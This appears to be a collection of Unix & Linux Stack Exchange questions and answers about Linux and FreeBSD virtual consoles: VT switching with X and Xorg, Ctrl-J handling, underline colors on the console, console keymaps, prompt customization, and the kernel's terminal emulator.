X takes up a new slot in the kernel's virtual-console data structures precisely so that Ctrl+Alt+Fn can switch between the text consoles and the X session.
This virtual console is not the console you started X from, but a different one. It is usually passed to the X server as an argument of the form vt1, vt2, etc. So if you run something like ps axu | grep X, you should be able to see which virtual console the X session runs on.
On many distributions this is virtual console 7 (and not 1), so you'll have to use Ctrl+Alt+F7 to switch to it. I'm not sure what Slackware currently uses as its default, however.
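To illustrate, here is a minimal sketch of pulling the vtN argument out of a ps line. The command path and VT number below are made up for the example; in practice you would pipe the real ps axu output through the same grep:

```shell
# Hypothetical ps output line for an X server; substitute `ps axu | grep X` in practice.
line='/usr/libexec/Xorg :0 vt7 -keeptty'
# Extract the vtN token that tells you which virtual console X runs on.
vt=$(printf '%s\n' "$line" | grep -o 'vt[0-9][0-9]*')
echo "$vt"    # vt7
```
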
|
I remember switching between TTYs on Ubuntu Linux and being able to switch back and forth between an active X session (Unity/KDE/XFCE) and a terminal on another numbered TTY thing / virtual console. I expected the same thing to work in Slackware Linux, but it doesn't appear to and I'm trying to figure out why.
I'm running Slackware 14.2 on a ThinkPad. KDE is my default desktop environment (the one started by startx).
If I start an X session via startx on TTY1 (the default), switch to TTY2 via Ctrl+Alt+F2, and then switch back with Alt+F1 (or Ctrl+Alt+F1), I don't see my X session; I see the shell session that I ran startx from. I can interact with the X process and suspend, interrupt, or kill it, but I can't "give it control of my monitor" again after initially switching away from TTY1.
I tried running exec startx from my login shell instead of just startx, but I still don't see my X session when switching back to TTY1.
In addition to the fact that I've switched between a GUI and console in Ubuntu before using Ctrl+Alt+F{1,2,3,4,5,6,7}, this question suggests to me that it should be possible to switch between a virtual console containing an X session and one without an X session in it:
How to switch between tty and xorg session
Excerpt taken from one of the answers:

Because X is running on tty1, but not on tty2. A tty is a "virtual terminal", meaning it is supposed to represent an actual physical screen and keyboard, etc. The terminals are all on simultaneously, but since you only have enough hardware to interface with one at a time, that's what you get.

This suggests that X does actually run "on" a virtual console, but I'm not exactly sure what that means.
|
How To Switch to Virtual Terminal Running X11 as Subprocess of Login Shell?
|
As Arkadiusz Drabczyk said, readline is responsible for the handling of C-v, and in particular of C-v C-j; it just handles C-j differently, presumably because C-j (newline) can be represented in a meaningful way without the ^X notation. The letter in that notation is obtained by OR'ing 0x40 into the character code, if you're curious. Put another way, 0x01 corresponds to ^A, 0x02 to ^B, and so on.
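As a quick sketch of that arithmetic, a small shell function that ORs 0x40 into a control code and prints the caret notation:

```shell
# Print the caret notation for a control character code: 1 -> ^A, 10 -> ^J, 0 -> ^@
caret() {
  printf '^'
  # OR 0x40 into the code, then print the resulting character via its octal value
  printf "\\$(printf '%03o' $(( $1 | 0x40 )))\n"
}
caret 1    # ^A
caret 10   # ^J  (Ctrl-J, newline)
caret 0    # ^@  (NUL)
```
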
As for vim, that (^@) is also how it represents newlines. And there are a couple of mentions in the documentation:

You can also use <NL> to separate commands in the same way as with '|'. To insert a <NL> use CTRL-V CTRL-J. "^@" will be shown.

https://github.com/vim/vim/blob/v8.2.4027/runtime/doc/cmdline.txt#L652-L653

NL-used-for-Nul
Technical detail:
<Nul> characters in the file are stored as <NL> in memory. In the display
they are shown as "^@". The translation is done when reading and writing
files. To match a <Nul> with a search pattern you can just enter CTRL-@ or
"CTRL-V 000". This is probably just what you expect. Internally the
character is replaced with a <NL> in the search pattern. What is unusual is
that typing CTRL-V CTRL-J also inserts a <NL>, thus also searches for a <Nul>
in the file.

https://github.com/vim/vim/blob/v8.2.4027/runtime/doc/pattern.txt#L1273-L1280

Probably it has something to do with vim storing null bytes as newlines in memory.
|
When I press Ctrl-V Ctrl-J in a shell (under urxvt), it starts a new line (positions the cursor at the beginning of a new line), instead of printing ^J.
In vim it prints ^@.
The same happens in the virtual console.
Apparently something preprocesses Ctrl-J. What is it, and how do I influence it?
$ stty -a
speed 38400 baud; rows 26; columns 101; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;
eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R;
werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk brkint ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff
-iuclc -ixany imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt
echoctl echoke -flusho -extproc
$ echo $TERM
rxvt-unicode-256color
$ urxvt --help |& head -1
rxvt-unicode (urxvt) v9.26 - released: 2021-05-14

UPD: I was configuring tmux, and this behavior made me think that bind-key C-j send-keys C-j doesn't work.
|
Special handling of Ctrl-J
|
The Linux console driver doesn't support underlines on color displays because it's a compromise between readability and ease of implementation. It's been that way since the mid 1990s, and is documented in console_codes(4):
4 set underscore (simulated with color on a color display)
  (the colors used to simulate dim or underline are set
  using ESC ] ...)

It's unlikely that you have anything other than a color display. You can change the color used for depicting underline, but it will be colored one way or another. The manual page mentions the escape sequence used to customize the palette:
ESC ] OSC (Should be: Operating system command) ESC ] P nrrggbb: set palette, with parameter given in 7 hexadecimal digits after the final P :-(. Here n is the color (0–15), and rrggbb indicates the red/green/blue values (0–255). ESC ] R: reset palette

and the escape sequences used to tell which of the 16 palette entries will show dim and underline:

ESC [ 1 ; n ] Set color n as the underline color.
ESC [ 2 ; n ] Set color n as the dim color.

Setting TERM to any variant of "xterm" will give poor results, because:

the Linux console driver lacks support for things that are found in the xterm terminal description, and
the linux terminal description is designed to use the actual features of the Linux console driver.

Use infocmp linux xterm-256color to see the differences. It's long, so here's a summary to show the size of the difference:
$ infocmp -1x linux | wc -l
122
$ infocmp -1x xterm-256color |wc -l
272
$ infocmp -1x linux xterm-256color | wc -l
213
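As a hedged sketch of the customization the manual page describes: the sequence ESC [ 1 ; n ] only has an effect on a real Linux console, and the palette index 6 below is just an arbitrary example. Here we only build the sequence and show its bytes rather than assume a console is attached:

```shell
# Build the Linux-console escape that picks palette entry n as the "underline" color.
underline_color() {
  printf '\033[1;%d]' "$1"
}
# Show the bytes (cat -v renders ESC as ^[); on a real console you would just emit them.
underline_color 6 | cat -v    # ^[[1;6]
```
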
|
I'm on Arch Linux (a 32-bit alternative build), and recently I discovered that the blue lines I used to see in Vim with :set cursorline were supposed to be underlined, not blue.
That got me searching all around for a solution.
I'm using no graphical environment, so no desktop environment or window manager, only good ol' tty with zsh, my current favorite shell.
I've discovered that :hi CursorLine cterm=bold makes the cursor line a lot prettier, as it's now no longer blue, just a lighter color for the most part, and that's already made my life better.
I also tried cterm=underline (still renders the line blue), undercurl, tried :hi clear CursorLine then doing all over again, but nothing brings me the underlines I want.
I tried Vim on fbterm, because I believe it's a quasi-graphical terminal emulator, but I got the same behavior, only with an uglier super-wide font.
This not only applies to Vim but to anything, it seems. I tried ANSI escape sequences with echo, and when trying to underline text I also got that blue color without underlines.
So I believe something is missing, be it a font, a shell config, a Vim config or whatever.
After searching quite a bit, I got no closer to an answer as to why my tty lacks those formatting options, so I decided to ask here.
It's also worth noting that I tried this on a Raspberry Pi 3B+ running Raspbian, and I got pretty much the same behavior on the tty.
The only place I managed to get that to work was on the X server I start from time to time to use Firefox. I spawned xterm on it and voila I got underlines even while typing commands on zsh.
I'll now try playing around with different terminal fonts to see if I get any closer to prettifying my tty.
Edit 01:
I recorded it with Asciinema, and it shows just fine there, but what I was actually seeing is as I described.

Edit 02:
I was reading this Arch Wiki page, in the section about terminal emulators, and decided to try yaft, as it sounded like it could be just the thing I was looking for.
It turned out I already had it installed, and using it does indeed enable at least some of the features I wanted, so that's great.
|
How to enable underlines and other formattings on a color tty?
|
This is an extended comment and not an answer.
On my system, where Ctrl+Alt+F1 works correctly, I get a KeyPress event for Control and Alt, but not for F1. I know it works, though, since I'm transferred to tty1.
This is the complete xev output in my case (just for comparison):
root@debi64:/home/gv/Desktop/PythonTests# xev -event keyboard
Outer window is 0x4400001, inner window is 0x4400002

KeymapNotify event, serial 18, synthetic NO, window 0x0,
    keys:  4294967192 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
           0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

KeyPress event, serial 25, synthetic NO, window 0x4400001,
    root 0x281, subw 0x0, time 11550957, (157,186), root:(748,462),
    state 0x0, keycode 64 (keysym 0xffe9, Alt_L), same_screen YES,
    XLookupString gives 0 bytes:
    XmbLookupString gives 0 bytes:
    XFilterEvent returns: False

KeyPress event, serial 28, synthetic NO, window 0x4400001,
    root 0x281, subw 0x0, time 11550960, (157,186), root:(748,462),
    state 0x8, keycode 37 (keysym 0xffe3, Control_L), same_screen YES,
    XLookupString gives 0 bytes:
    XmbLookupString gives 0 bytes:
    XFilterEvent returns: False

KeyRelease event, serial 28, synthetic NO, window 0x4400001,
    root 0x281, subw 0x0, time 11553775, (157,186), root:(748,462),
    state 0xc, keycode 67 (keysym 0x1008fe01, XF86Switch_VT_1), same_screen YES,
    XLookupString gives 0 bytes:
    XFilterEvent returns: False

KeyRelease event, serial 28, synthetic NO, window 0x4400001,
    root 0x281, subw 0x0, time 11553902, (157,186), root:(748,462),
    state 0xc, keycode 37 (keysym 0xffe3, Control_L), same_screen YES,
    XLookupString gives 0 bytes:
    XFilterEvent returns: False

KeyRelease event, serial 28, synthetic NO, window 0x4400001,
    root 0x281, subw 0x0, time 11553902, (157,186), root:(748,462),
    state 0x8, keycode 64 (keysym 0xffe9, Alt_L), same_screen YES,
    XLookupString gives 0 bytes:
    XFilterEvent returns: False

KeymapNotify event, serial 28, synthetic NO, window 0x0,
    keys:  4294967169 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
           0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0

ClientMessage event, serial 28, synthetic YES, window 0x4400001,
    message_type 0x11b (WM_PROTOCOLS), format 32, message 0x119 (WM_DELETE_WINDOW)

I also created a small python script that simulates the Ctrl+Alt+F1 key press. When I run the script, I'm also transferred to tty1 without problem.
You could even try running this script on your machine to see whether or not you end up at tty1, as a double check that your keyboard works OK:
https://github.com/gevasiliou/PythonTests/blob/master/pykey-test.py
PS: Instead of the script, you could also try running chvt 1 (as root), which should also transfer you to tty1.
After some research: other users have reported that the Ctrl+Alt+Fn keys stopped working after X server updates, which modified some resolution settings that apply to ttys.
For example in this post, the problem was solved by applying a specific VGA resolution during boot as a kernel parameter (vga=mode), like vga=0x0362. Apparently one of those system updates messed up the tty resolutions on those systems, so maybe this is also your case (and only God knows why).
PS: To see the modes your system supports, run hwinfo --framebuffer | grep 'Mode' and select a mode from the ones listed.
By the way, you have included some part of xev with F3 in your question, but what is the output with F1?
UPDATE:
As further troubleshooting, it could be worth trying some of the following:

Looking at the xrandr source code, it seems that the --off option executes the following commands:
set_name_xid (&config_output->mode, None);
set_name_xid (&config_output->crtc, None);
config_output->changes |= changes_mode | changes_crtc;

You could try to re-enable the --output by specifying the --mode and --crtc xrandr options instead of --auto (just in case xrandr's "automation" is not working correctly).

In this kernel document about the console, you can see the drivers / supported modules for the operation of virtual consoles, under the directory /sys/class/vtconsole.
You could compare the values of all the files/modules during power-on and after the power-off that gives you the different behavior.
Maybe something is modifying those values at --off time.

This is a printout from my system, in which switching to tty1-2-3-4-5-6 works OK:
root@debi64:/home/gv/Desktop/PythonTests# for f in $(find /sys/class/vtconsole/vtcon0/ -type f);do echo -e "File : $f \c\c\c";echo -e "-VALUE : \c";cat $f;done
File : /sys/class/vtconsole/vtcon0/bind -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/runtime_active_kids -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/runtime_suspended_time -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/autosuspend_delay_ms -VALUE : cat: /sys/class/vtconsole/vtcon0/power/autosuspend_delay_ms: Input/output error
File : /sys/class/vtconsole/vtcon0/power/runtime_enabled -VALUE : disabled
File : /sys/class/vtconsole/vtcon0/power/runtime_active_time -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/control -VALUE : auto
File : /sys/class/vtconsole/vtcon0/power/async -VALUE : disabled
File : /sys/class/vtconsole/vtcon0/power/runtime_usage -VALUE : 0
File : /sys/class/vtconsole/vtcon0/power/runtime_status -VALUE : unsupported
File : /sys/class/vtconsole/vtcon0/uevent -VALUE :
File : /sys/class/vtconsole/vtcon0/name -VALUE : (S) VGA+
root@debi64:/home/gv/Desktop/PythonTests# for f in $(find /sys/class/vtconsole/vtcon1/ -type f);do echo -e "File : $f \c\c\c";echo -e "-VALUE : \c";cat $f;done
File : /sys/class/vtconsole/vtcon1/bind -VALUE : 1
File : /sys/class/vtconsole/vtcon1/power/runtime_active_kids -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/runtime_suspended_time -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/autosuspend_delay_ms -VALUE : cat: /sys/class/vtconsole/vtcon1/power/autosuspend_delay_ms: Input/output error
File : /sys/class/vtconsole/vtcon1/power/runtime_enabled -VALUE : disabled
File : /sys/class/vtconsole/vtcon1/power/runtime_active_time -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/control -VALUE : auto
File : /sys/class/vtconsole/vtcon1/power/async -VALUE : disabled
File : /sys/class/vtconsole/vtcon1/power/runtime_usage -VALUE : 0
File : /sys/class/vtconsole/vtcon1/power/runtime_status -VALUE : unsupported
File : /sys/class/vtconsole/vtcon1/uevent -VALUE :
File : /sys/class/vtconsole/vtcon1/name -VALUE : (M) frame buffer device

Finally, it could be worthwhile to investigate possible automatic power-saving features, like X server DPMS settings, that could be activated automatically after long periods of inactivity.

Second Update:
Looking around, I found that DPMS and other useful power-save settings on virtual terminals can be controlled with the setterm command.
If your virtual terminals seem to be sleeping, you could try to wake them up by sending them a setterm --reset command.
To send a command from your regular tty7 to another tty, use:
setsid bash -c 'exec setterm --reset <> /dev/tty1 >&0 2>&1'
The only catch is that you must be logged in at tty1.
For testing you can use
setsid bash -c 'exec setterm --reverse on <> /dev/tty1 >&0 2>&1'
and if you then switch to tty1 with chvt 1 you can observe the result (--reverse on swaps the terminal colors; tested and working on Debian).
Moreover, setterm gives you options to enable/disable power saving with setterm --powersave off, and many more (see man setterm).
|
(After editing significant new info into the question)
After turning a display off from the command line (xrandr --output ... --off) and then turning it back on (xrandr --output ... --auto), my X desktop loses the ability to switch to a character console (i.e. Ctrl+Alt+F1 doesn't work any more).
Other X controlling shortcuts (Ctrl+Alt+Backspace) still work.
Why? How do I re-enable this feature?

Info: it is Linux Mint, latest stable. The problem happens explicitly after I switch the display off with xrandr --output ... --off from the command line and then turn it on again the next morning (with an xrandr --output ... --auto command).
I use this because I need to turn the display off completely before I go home, and the normal settings (energy settings somewhere in the control panel) aren't enough, or are buggy.
My keyboard is okay; for example, xev shows the Ctrl+Alt+F3 release event correctly:
KeyRelease event, serial 37, synthetic NO, window 0x3c00001,
    root 0x2e1, subw 0x0, time 1622285717, (99,77), root:(961,532),
    state 0xc, keycode 69 (keysym 0x1008fe03, XF86Switch_VT_3), same_screen YES,
    XLookupString gives 0 bytes:
    XFilterEvent returns: False

But the KeyPress event is not in the list. Thus, xev can't see the press of Ctrl+Alt+F3, but somehow it can see its release.

Debug output:
$ xmodmap -pke|grep -i xf86switch
keycode 67 = F1 F1 F1 F1 F1 F1 XF86Switch_VT_1 F1 F1 XF86Switch_VT_1
keycode 68 = F2 F2 F2 F2 F2 F2 XF86Switch_VT_2 F2 F2 XF86Switch_VT_2
keycode 69 = F3 F3 F3 F3 F3 F3 XF86Switch_VT_3 F3 F3 XF86Switch_VT_3
keycode 70 = F4 F4 F4 F4 F4 F4 XF86Switch_VT_4 F4 F4 XF86Switch_VT_4
keycode 71 = F5 F5 F5 F5 F5 F5 XF86Switch_VT_5 F5 F5 XF86Switch_VT_5
keycode 72 = F6 F6 F6 F6 F6 F6 XF86Switch_VT_6 F6 F6 XF86Switch_VT_6
keycode 73 = F7 F7 F7 F7 F7 F7 XF86Switch_VT_7 F7 F7 XF86Switch_VT_7
keycode 74 = F8 F8 F8 F8 F8 F8 XF86Switch_VT_8 F8 F8 XF86Switch_VT_8
keycode 75 = F9 F9 F9 F9 F9 F9 XF86Switch_VT_9 F9 F9 XF86Switch_VT_9
keycode 76 = F10 F10 F10 F10 F10 F10 XF86Switch_VT_10 F10 F10 XF86Switch_VT_10
keycode 95 = F11 F11 F11 F11 F11 F11 XF86Switch_VT_11 F11 F11 XF86Switch_VT_11
keycode 96 = F12 F12 F12 F12 F12 F12 XF86Switch_VT_12 F12 F12 XF86Switch_VT_12

The command xmodmap -pke | grep ' F[0-9]\+' gives exactly the same result.

Additional info: the capability to switch to a character console was lost on power off, not on power on (thus, I had to ssh into my workstation from my mobile to enter the xrandr --output ... --auto command).

Scripting test: I've tried @GeorgeVasilou's script, which emulates the keyboard hits by injecting X11 events. The result is negative: the emulated Ctrl+Alt+F1 sequence appears only as a single H.
|
X: alt/ctrl/f1 doesn't work any more after turning the display off and on again with xrandr
|
Set PS1 conditionally on the value of $TTY. The first virtual console is /dev/ttyv0, the second one is /dev/ttyv1, etc.
For zsh, do it in ~/.zshrc. For bash, do it in ~/.bashrc.
if [[ $TTY == /dev/ttyv[1-9]* ]]; then
  PS1="[${TTY#/dev/ttyv}] $PS1"
fi

The code for doing just this is the same in bash and zsh. If you want further effects in your prompt (current directory, host name, colors, …), the format of PS1 depends on the shell: zsh and bash both support prompt escapes, but they're completely different.
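If your shell doesn't provide $TTY (zsh sets it, but bash generally doesn't), a hedged variant is to derive the name with tty(1). The vt_prefix helper below is hypothetical, written as a function so the match logic is easy to test; note that /dev/ttyvN corresponds to console N+1 (ALT-F(N+1)):

```shell
# Hypothetical helper: print a "[N] " prefix when the tty is a non-default FreeBSD console.
vt_prefix() {
  case $1 in
    /dev/ttyv[1-9]*) printf '[%s] ' "${1#/dev/ttyv}" ;;
  esac
}
# In ~/.bashrc you might then use: PS1="$(vt_prefix "$(tty)")$PS1"
vt_prefix /dev/ttyv2   # prints "[2] "
vt_prefix /dev/ttyv0   # prints nothing (the first console keeps the default prompt)
```
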
|
When I use the virtual consoles (ALT-F<1~n>) in FreeBSD, I want my zsh and sh (and possibly other shells') startup scripts to include the virtual console number in the prompt, if it's not the default console '1'.
How do I do that?
|
How to include my virtual console ID in the prompt, in FreeBSD
|
For unknown reasons (a bug?) you have to explicitly use the -t flag to specify the console type, which can be either of the two types, serial or pv. Either works!
So either of the following two work:
sudo xl console -t pv sys-net
sudo xl console -t serial sys-net
But this won't work for sys-net:
sudo xl console sys-net
$ xl console --help
Usage: xl [-v] console [options] <Domain>
-t <type> console type, pv or serial
-n <number>   console number

Attach to domain's console.

[ctor@dom0 ~]$ sudo xl console -t pv sys-net
Fedora 28 (Twenty Eight)
Kernel 4.14.67-1.pvops.qubes.x86_64 on an x86_64 (hvc0)

sys-net login:

[ctor@dom0 ~]$ sudo xl console -t serial sys-net
Fedora 28 (Twenty Eight)
Kernel 4.14.67-1.pvops.qubes.x86_64 on an x86_64 (hvc0)

sys-net login:

[ctor@dom0 ~]$ sudo xl console sys-net
xenconsole: Could not read tty from store: No such file or directory

[ctor@dom0 ~]$ rpm -qf `which xl`
xen-runtime-4.8.4-2.fc25.x86_64

Note: Exit the console by pressing Ctrl+]
sys-net has Virtualization mode set to HVM. All the other VMs have it set to default (PVH). That seems to be the main difference.
|
I tried xl console sys-net, which works for any other VM (AppVM, TemplateVM); it even works for sys-net-dm (though I don't know what that is).
[ctor@dom0 ~]$ time sudo xl console sys-net
xenconsole: Could not read tty from store: No such file or directory

real 0m5.036s
user 0m0.005s
sys  0m0.015s

[ctor@dom0 ~]$ rpm -qf `which xl`
xen-runtime-4.8.4-2.fc25.x86_64
|
On Qubes OS 4.0, how to get xl console access to sys-net?
|
I can only tell you a dirty workaround.
Use xbindkeys and add to ~/.xbindkeysrc:
"sudo chvt $(($XDG_VTNR-1))"
  alt + c:113

"sudo chvt $(($XDG_VTNR+1))"
  alt + c:114

If you don't have the XDG_VTNR variable, then you have to hardcode the previous/next VT.
You also have to put yourself into /etc/sudoers:
USER ALL=NOPASSWD:/bin/chvt
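The arithmetic those two bindings rely on can be sketched as follows. XDG_VTNR is set by hand here for the example (normally the login session exports it), and the clamp to 1 is an extra safety the bindings above don't have:

```shell
# Assume we're on VT 1 (normally XDG_VTNR is exported by the login session).
XDG_VTNR=1
prev=$(( XDG_VTNR > 1 ? XDG_VTNR - 1 : 1 ))   # clamp: there is no VT 0
next=$(( XDG_VTNR + 1 ))
echo "chvt $prev / chvt $next"    # chvt 1 / chvt 2
```
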
|
One can change virtual consoles (or virtual terminals, VTs) by pressing Ctrl+Alt+Fn (where Fn represents F1, F2, etc.). In addition, when not running X, one can press Alt and the arrow keys to cycle through VTs (Alt← to decrement and Alt→ to increment the virtual terminal).
However, if X is running on one of the VTs, the arrow key bindings are not typically set and one must fall back to Ctrl+Alt+Fn to change to another VT.
I generally prefer using the arrow bindings to change VTs. To avoid having to switch between key bindings (Ctrl+Alt+Fn for VTs with X; arrows for VTs without it), to what command would one bind Alt←/→ for decrementing/incrementing the VT in X?
In case the answer depends on the system, I am running Debian and using dwm and openbox as window managers.
|
key binding to increment/decrement virtual console in X
|
Starting the X server and then exiting it seems to fix the problem. A bit heavy-handed, but better than rebooting.
|
I have a KVM switch sharing my USB keyboard between Linux and Windows systems. If the switch is set to the Linux box when it boots up then the keyboard works fine. If I switch away to the Windows box the keyboard still works fine, but if I switch back to Linux I start getting missed and repeated keystrokes, making it almost unusable. This is on a virtual terminal and the problem carries across to the other vts as well.
Is there some way that I can reset the keyboard or its driver without having to reboot?
I'm running an ancient Fedora Core 8 distro, if that matters.
Thanks.
|
How to reset keyboard driver?
|
You are mis-remembering how Xorg used to work :). Remember that X used to start on VT7 and up, because VT1 through VT6 were reserved for text consoles.
With systemd and logind, by default the VTs are set up on-demand. If you never switched to VT2, then getty and login are not started on VT2. Instead, VT2 remains available... and can be claimed by a program like Xorg, which uses the first free VT.
Another way to see that your Xorg session is actually on VT2 is that ps -ax will show that it has tty2 as its controlling terminal.
In the old system, if you logged in to a text VT and started Xorg, it would never re-use your current text VT. I was confused because startx re-uses your text VT on a modern system, but this is due to using logind. With logind, X is able to start as an unprivileged process, and it does not have the privilege to switch to a different VT. The -keeptty option mentioned in the log message was added specifically for this reason.

I suggest not trying to run Xorg -keeptty inside sudo -i. -keeptty was not specifically intended for this case. At least, it does not work correctly on my system; it seems the old and the new code start fighting with each other :)
I get a screen showing a text cursor (underline) which is not flashing, and Ctrl+Alt+F6 does not switch to text VT6; I have to use Alt+SysRq+R first (I have enabled SysRq on my Fedora system). Switching back to the original VT with Ctrl+Alt+F5 then shows the black screen that I would have expected. The controlling terminal of the X process is tty5, but lsof -p shows that it also has tty2 open. Switching to VT2 dumps me back on VT5, with Xorg logging an error:
[ 40399.826] (II) AIGLX: Suspending AIGLX clients for VT switch
[ 40399.826] (II) AIGLX: Resuming AIGLX clients after VT switch
[ 40399.826] (EE) modeset(0): failed to set mode: Permission denied
[ 40399.826] (EE)
Fatal server error:
[ 40399.827] (EE) EnterVT failed for screen 0
[ 40399.827] (EE)
[ 40399.827] (EE)
Please consult the Fedora Project support
at http://wiki.x.org
for help.
[ 40399.827] (EE) Please also check the log file at "/var/log/Xorg.10.log" for additional information.
[ 40399.827] (EE)
[ 40399.828] (II) AIGLX: Suspending AIGLX clients for VT switch
[ 40400.029] (EE) Server terminated with error (1). Closing log file.
|
Version of affected software:
$ rpm -q --whatprovides /usr/bin/Xorg
xorg-x11-server-Xorg-1.19.6-8.fc28.x86_64

(In other words, this is on a currently up-to-date install of Fedora 28 Workstation.)

Steps to reproduce:

Use ctrl+alt+f5 to switch to text VT 5 and log in
sudo -i
Xorg :10
Use ctrl+alt+f6 to switch to text VT 6
Use ctrl+alt+f5 to switch back to VT 5

Expected results: I see the graphical X session (a completely black screen with no mouse cursor :).
Actual results: I see a text console with some log messages from Xorg. The Xorg process is still running.
Additional information:
The last line shown on the screen is
(II) AIGLX: Suspending AIGLX clients for VT switch

Also, /var/log/Xorg.10.log shows that Xorg is not using systemd-logind:
(II) systemd-logind: logind integration requires -keeptty and -keeptty was not provided, disabling logind integration
|
Why is VT switching not working for Xorg run as root?
|
There's a terminal emulator program built into the Linux kernel. It doesn't manifest as a running process with open file handles. It's layered on top of the framebuffer and the input event subsystem, which it uses internal kernel interfaces to access. It presents itself to application-mode systems as a series of kernel virtual terminal devices, /dev/tty1 and so forth, a pseudo-file under /sys that shows the active KVT number, and a series of CGA-style video buffer devices, /dev/vcsa1 and so forth.
Normally, it is the kernel terminal emulator that recognizes the ⎇Alt+Fn key chords. It's all done entirely within kernel-mode code. (You can build a kernel that does not have this code by disabling the CONFIG_VT build option.)
Application software can disable this, however. An Xorg server does so, for example. When it is active on-screen, it temporarily turns off or disconnects most of the kernel terminal emulator, recognizes its own key chords (⎈Control+⎇Alt+Fn), and uses ioctl() system calls to switch the active KVT away under program control. Effectively, the Xorg server is using KVT switching as a means to negotiate exclusive access to the framebuffer and the HIDs that it shares with the kernel's built-in terminal emulator.
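For instance, the pseudo-file under /sys mentioned above can be read directly. The fallback below is only so the snippet degrades gracefully on systems without a visible VT layer; the path itself is the standard one on Linux:

```shell
# Read which kernel VT is currently active; fall back when /sys exposes no VT info.
active=$(cat /sys/class/tty/tty0/active 2>/dev/null || echo 'tty1 (fallback: no VT layer visible)')
echo "Active KVT: $active"
# Switching uses the same ioctl interface that chvt(1) wraps, e.g.:  chvt 2  (as root)
```
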
Further reading

https://unix.stackexchange.com/a/333922/5132
https://unix.stackexchange.com/a/178807/5132
https://unix.stackexchange.com/a/489983/5132
https://unix.stackexchange.com/a/177209/5132
https://unix.stackexchange.com/a/194218/5132
|
With Alt+Fn you can switch between virtual consoles in most Linux distributions. What application handles the switching of consoles, and how? I suppose it has to read the keyboard input before all other processes. Or is it handled by a device driver or another kernel module?
|
What application manages the consoles
|
https://unix.stackexchange.com/a/4132/153329

pseudo-ttys are provided (through a thin kernel layer) by programs called terminal emulators, such as xterm (running in the X Window System), screen (which provides a layer of isolation between a program and another terminal), or ssh (which connects a terminal on one machine with programs on another machine)

With ssh user@ip you get a shell running in a pseudo-terminal (not an X11 terminal emulator).
With ssh -X you get X11 forwarding: an SSH feature that enables users to run graphical applications on a remote server and interact with them using their local display and I/O devices.
X11 uses a client-server model, where an X server is a program on a machine which manages access to graphical displays and input devices (monitors, mice, keyboards, etc.), and an X client is a program which handles graphical data.
X servers and X clients can communicate over a network.
As far as I've understood, a terminal emulator is a GUI-based program which gives me a terminal-like viewport and allows me to interact with it just like I'd do with a terminal, except that it has all the support from the X system, so I suspect that ssh user@ip will not give me access to a terminal emulator running on the remote machine. If I want to use that, I need to connect to that machine via VNC, and then open a terminal emulator window in that desktop.
But do I get access to a virtual console (one that, physically on the remote machine, I'd get via Ctrl+Alt+F2, for instance)? I can ssh -X ..., which gives me access to the clipboard, which comes with X, so it kind of feels like I'm not in a virtual console either...

As regards the proposed duplicate, since my question is specifically about SSH, the information I can gather is the following:

Ssh (which connects a terminal on one machine with programs on another machine)

from the accepted answer,

pseudoterminals use PTY "devices" to arrange communication between console applications and the terminal-making program that runs in userspace. Examples are X-based terminal emulators and sshd, which allocates a pseudotty for each login session.

from another answer,

There may be some application that "emulates" a terminal, accepting keystrokes from the user and sending them somewhere (xterm and ssh are good examples). There is an API in the kernel called pseudo terminal for that. So your tty may really be connected to some application instead of a real terminal. Xterm uses X11 to display text and ssh uses a network connection for it.

from yet another answer;

so the answer to my question seems to be "it gives access to a pseudo terminal".
|
Does ssh give access to the virtual console, to a terminal emulator, or what? [duplicate]
|
Okay, I found an alternative way to declare it that works: the number system described in the keymaps manpage. Note that in /usr/share/keymaps/i386/qwerty/us.map.gz (unpacked), there is the line keymaps 0-2,4-6,8-9,12, omitting 3, which is what I need (Shift+AltGr). So my file now looks like this, and it works fine:

include "us.map"
keymaps 0-3
keycode 22 = u U udiaeresis Udiaeresis
keycode 24 = o O odiaeresis Odiaeresis
keycode 30 = a A adiaeresis Adiaeresis
keycode 31 = s S ssharp

I still don't understand the error in the question, though.
|
I am using Artix Linux with OpenRC.
I want to define a custom console keymap to generally use the US-design, but add some extra functionality for German umlauts. The following does work:
/usr/share/keymaps/i386/qwerty/mymap.map:
include "us.map"
altgr keycode 30 = adiaeresis

Activating with rc-update add keymaps boot / rc-service keymaps restart, as described here.
With these configurations, when I press AltGr+a, ä gets printed as intended.
I want to do the same for AltGr+Shift+a to produce Ä. However, adding the line
shift altgr keycode 30 = Adiaeresis
to my keymap and then restarting the service yields the following error:
Setting keyboard mode [UTF-8] ... [ ok ]
Loading key mappings [mymap] ...
adding map 3 violates explicit keymaps line
Error loading key mappings [ !! ]
ERROR: keymaps failed to startWhat does that tell me and how can I fix it?
altgr shift keycode 30 = Adiaeresis has the same result.
I also tried to modify the existing line to altgr keycode 30 = adiaeresis Adiaeresis, but that yields syntax error, unexpected LITERAL, expecting EOL.
I use this as a reference, but I find it hard to read and interpret.
|
shift altgr combination for console keymap
|
In vgacon, the hardware chooses the width, and it’s always the full width of a character cell — that’s all that VGA supports. mdacon is similar, for the same reason.
Other console implementations with cursor size handling can be found by looking for CUR_UNDERLINE. Some of them, such as fbcon, could theoretically support cursors of varying widths too, but they all match the behaviour of the original Linux console (the VGA one) and use a fixed width.
|
In the Linux source code, specifically in linux/drivers/video/console/vgacon.c, there is a switch-case block for cursor shapes. Each of these shapes is a rectangle of the same width and varying height. Clearly, Linux handles the height of the cursor, but does it handle the width? Does Linux choose the width, or does the GPU decide? Does this vary between the other *.cons (some of which have switch cases for cursors)?
|
What handles virtual console cursor specifics?
